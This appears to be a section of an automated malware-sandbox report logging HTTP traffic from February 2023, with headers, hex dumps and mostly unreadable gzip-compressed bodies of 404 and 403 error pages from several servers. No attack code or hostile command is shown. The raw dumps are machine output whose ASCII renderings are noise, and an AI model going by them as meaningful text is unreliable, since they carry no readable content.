2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf 3f 1b 0c ce 0b 5e ad 8a 94 3c 1d Data Ascii: }k[%$E%JI$u|V5]dHj49Su
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Feb 2023 18:05:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.1.15x-litespeed-tag: 90d_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecontent-encoding: gzipvary: Accept-EncodingData Raw: 31 34 62 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf Data Ascii: 14b8}k[%$E%JI$u|V5]dHj49Su{
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Feb 2023 18:05:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.1.15x-litespeed-tag: 90d_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecontent-encoding: gzipvary: Accept-EncodingData Raw: 39 36 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf 3f Data Ascii: 968}k[%$E%JI$u|V5]dHj49Su{
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Feb 2023 18:05:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kAyLPb6LWl1T%2BEpWbuT177iAfcBcbSiZgW6W1bdN4jQvqCyCbz2b9LuWLpmtf%2B%2FLgPzaY1HHwf3REV%2FKyUOBA1yi8%2BeAzqmMH5bQFMv6dokCP8nBjYqTFI0XNeXPjFUuCu9r210%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 798f7df6aed23a86-FRAContent-Encoding: gzipData Raw: 38 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 2c 3f 22 8d 54 74 1d 2f ea dd 34 31 6a 07 6d 50 14 06 67 78 47 c3 98 43 4e 49 4a b2 90 fa bf 2f 38 0f 79 f4 88 9b 60 b1 a8 3f 58 c3 d7 e5 7d 1c 5e 1e de f0 d5 9b f7 97 77 1f 6f ae 20 75 99 9c b7 c2 57 94 fe 26 12 90 0e ae af e0 fc f7 39 84 7e 00 62 c9 ac 9d 11 a5 e9 27 0b 02 cf 40 4b 2e 90 80 64 6a 31 23 a8 e8 87 5b 32 87 f0 d5 6f a8 b8 48 7e a7 f4 59 54 25 07 e0 b8 a8 f3 6f 13 75 f1 82 a8 8b 6f 10 b5 70 95 34 df 71 cc ca 43 29 94 ee 4a 4a 91 f1 79 2b 74 c2 49 9c bf 79 77 0b b9 16 ca 59 70 1a 72 a3 53 11 09 87 1c ae 6f e0 4f 58 af d7 7d ed 74 ae b9 d4 0b d1 8f 75 06 7f c2 a5 d4 4b 9e 48 66 30 0c 4a 21 ad 30 43 c7 20 4e 99 b1 e8 66 e4 c3 dd bf e8 05 81 a0 1e 48 9d cb 29 fe b1 14 ab 19 b9 d4 ca a1 72 f4 6e 93 23 81 b8 6c cd 88 c3 47 17 78 63 a6 5b 31 2f 49 f9 95 7e f8 81 5e ea 2c 67 4e 44 b2 29 e8 fa 6a 76 c5 17 d8 58 a7 58 86 33 62 74 a4 9d 6d 4c 54 5a 28 8e 8f 3d 50 3a d1 52 ea f5 c1 92 95 c0 75 ae 8d 6b 2c 5a 0b ee d2 19 c7 95 88 91 16 8d 9e 50 c2 09 26 a9 8d 99 c4 d9 b0 94 22 85 7a 00 83 72 46 ac db 48 b4 29 a2 23 20 f8 8c c4 c9 7d d9 45 63 6b 09 a4 06 93 19 09 62 ae 68 bc 10 41 39 14 64 4c a8 7e 31 1e cc 5b ad 56 68 63 23 72 37 6f 75 92 a5 8a 9d d0 aa d3 fd 2c 92 Data Ascii: 890Xko7_qT5,?"Tt/41jmPgxGCNIJ/8y`?X}^wo uW&9~b'@K.dj1#[2oH~YT%ouop4qC)JJy+tIywYprSoOX}tuKHf0J!0C NfH)rn#lGxc[1/I~^,gND)jvXX3btmLTZ(=P:Ruk,ZP&"zrFH)# }EckbhA9dL~1[Vhc#r7ou,
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Feb 2023 18:05:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yXfEG0IGdH%2BaQqCVBUFtK8tOMm4s7jle8dCW%2BqwTOaiAlAu4ocbrcNHrYnCQJ21Vbh8M3Pbfn8I2o2i%2BUpMmGUm4dg4RO%2FKZaLO5upMDm1ZASukwvuuctZT0rY8lst%2FvOJmOqxU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 798f7e067de535f4-FRAContent-Encoding: gzipData Raw: 38 38 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 5c 09 10 35 1a f9 19 69 34 45 d7 f1 a2 de 4d 13 a3 76 d0 06 45 61 70 86 77 24 c6 1c 72 4a 52 92 85 d4 ff 7d c1 79 c8 a3 47 dc 04 8b 45 fd c1 1a be 2e ef e3 f0 f2 f0 46 af de bc bf bc fb 78 73 05 73 97 cb b8 13 bd a2 f4 37 91 81 74 70 7d 05 e7 bf c7 10 f9 01 48 25 b3 76 4a 94 a6 9f 2c 08 3c 03 2d b9 40 02 92 a9 d9 94 a0 a2 1f 6e 49 0c d1 ab df 50 71 91 fd 4e e9 b3 a8 5a 0e c0 61 51 e7 df 26 ea e2 05 51 17 df 20 6a e6 6a 69 be e3 90 95 fb 52 28 dd 96 34 47 c6 e3 4e e4 84 93 18 bf 79 77 0b 85 16 ca 59 70 1a 0a a3 e7 22 11 0e 39 5c df c0 9f b0 5a ad 06 da e9 42 73 a9 67 62 90 ea 1c fe 84 4b a9 17 3c 93 cc 60 14 54 42 3a 51 8e 8e 41 3a 67 c6 a2 9b 92 0f 77 ff a2 17 04 82 66 60 ee 5c 41 f1 8f 85 58 4e c9 a5 56 0e 95 a3 77 eb 02 09 a4 55 6b 4a 1c 3e ba c0 1b 33 d9 88 79 49 ca af f4 c3 0f f4 52 e7 05 73 22 91 6d 41 d7 57 d3 2b 3e c3 d6 3a c5 72 9c 12 a3 13 ed 6c 6b a2 d2 42 71 7c ec 83 d2 99 96 52 af f6 96 2c 05 ae 0a 6d 5c 6b d1 4a 70 37 9f 72 5c 8a 14 69 d9 e8 0b 25 9c 60 92 da 94 49 9c 86 95 14 29 d4 03 18 94 53 62 dd 5a a2 9d 23 3a 02 82 4f 49 9a dd 57 5d 34 b5 96 c0 dc 60 36 25 41 ca 15 4d 67 22 a8 86 82 9c 09 35 28 c7 83 b8 d3 e9 44 36 35 a2 70 71 a7 9b 2d 54 ea 84 56 dd de 67 91 75 Data Ascii: 88eXko7_q\5i4EMvEapw$rJR}yGE.Fxss7tp}H%vJ,<-@nIPqNZaQ&Q jjiR(4GNywYp"9\ZBsgbK<`TB:QA:gwf`\AXNVwUkJ>3yIRs"mAW+>:rlkBq|R,m\kJp7r\i%`I)SbZ#:OIW]4`6%AMg"5(D65pq-TVgu
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Feb 2023 18:05:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t2bGxKp9VQE67rI2ej%2FCRvdU8ARYFsjicS%2FK%2FYRMGFcnT%2Fc5MxeR%2B7Gb9xAckchpDnqsN3HJYDdN13vKtnTcbMddnazI4mTjnHTBSER2l3GxEmIQV40vVdCQ00WY3ctyExjbULQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 798f7e165ce192c9-FRAContent-Encoding: gzipData Raw: 38 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 2c c7 8e 34 52 d1 75 bc a8 77 d3 c4 a8 1d b4 41 51 18 9c e1 1d 0d 63 0e 39 25 29 c9 42 ea ff be e0 3c e4 d1 c3 6e 82 c5 a2 fe 60 0d 5f 97 f7 71 78 79 78 c3 57 6f 3f 5c dc 7e ba be 84 d4 65 72 de 0a 5f 51 fa 9b 48 40 3a b8 ba 84 b3 df e7 10 fa 01 88 25 b3 76 46 94 a6 9f 2d 08 7c 0d 5a 72 81 04 24 53 8b 19 41 45 3f de 90 39 84 af 7e 43 c5 45 f2 3b a5 4f a2 2a 39 00 c7 45 9d 7d 9b a8 f3 17 44 9d 7f 83 a8 85 ab a4 f9 8e 63 56 1e 4a a1 74 57 52 8a 8c cf 5b a1 13 4e e2 fc ed fb 1b c8 b5 50 ce 82 d3 90 1b 9d 8a 48 38 e4 70 75 0d 7f c2 7a bd ee 6b a7 73 cd a5 5e 88 7e ac 33 f8 13 2e a4 5e f2 44 32 83 61 50 0a 69 85 19 3a 06 71 ca 8c 45 37 23 1f 6f ff 45 cf 09 04 f5 40 ea 5c 4e f1 8f a5 58 cd c8 85 56 0e 95 a3 b7 9b 1c 09 c4 65 6b 46 1c 3e b8 c0 1b 33 dd 8a 79 49 ca af f4 e3 0f f4 42 67 39 73 22 92 4d 41 57 97 b3 4b be c0 c6 3a c5 32 9c 11 a3 23 ed 6c 63 a2 d2 42 71 7c e8 81 d2 89 96 52 af 0f 96 ac 04 ae 73 6d 5c 63 d1 5a 70 97 ce 38 ae 44 8c b4 68 f4 84 12 4e 30 49 6d cc 24 ce 86 a5 14 29 d4 3d 18 94 33 62 dd 46 a2 4d 11 1d 01 c1 67 24 4e ee ca 2e 1a 5b 4b 20 35 98 cc 48 10 73 45 e3 85 08 ca a1 20 63 42 f5 8b f1 60 de 6a b5 42 1b 1b 91 bb 79 ab 93 2c 55 ec 84 56 9d ee 17 91 Data Ascii: 890Xko7_qT5,4RuwAQc9%)B<n`_qxyxWo?\~er_QH@:%vF-|Zr$SAE?9~CE;O*9E}DcVJtWR[NPH8puzks^~3.^D2aPi:qE7#oE@\NXVekF>3yIBg9s"MAWK:2#lcBq|Rsm\cZp8DhN0Im$)=3bFMg$N.[K 5HsE cB`jBy,UV
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Feb 2023 18:05:32 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BImvFNT3FOOlkeMfL6I62XRQwIif4X39yHzoPGdgzMw1FXkHQ5CR%2Bh%2FGnElt3HWNiW7hsmdly4ACn%2FcLkyYtabeX20P8b2Sho1HZYY00aEpxz%2FeEpF2RsDCTKMexgdkPyuUXrik%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 798f7e261d4c35e4-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 30 Data Ascii: error code: 1000
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Feb 2023 18:05:37 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Feb 2023 18:05:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Feb 2023 18:05:43 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Feb 2023 18:05:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
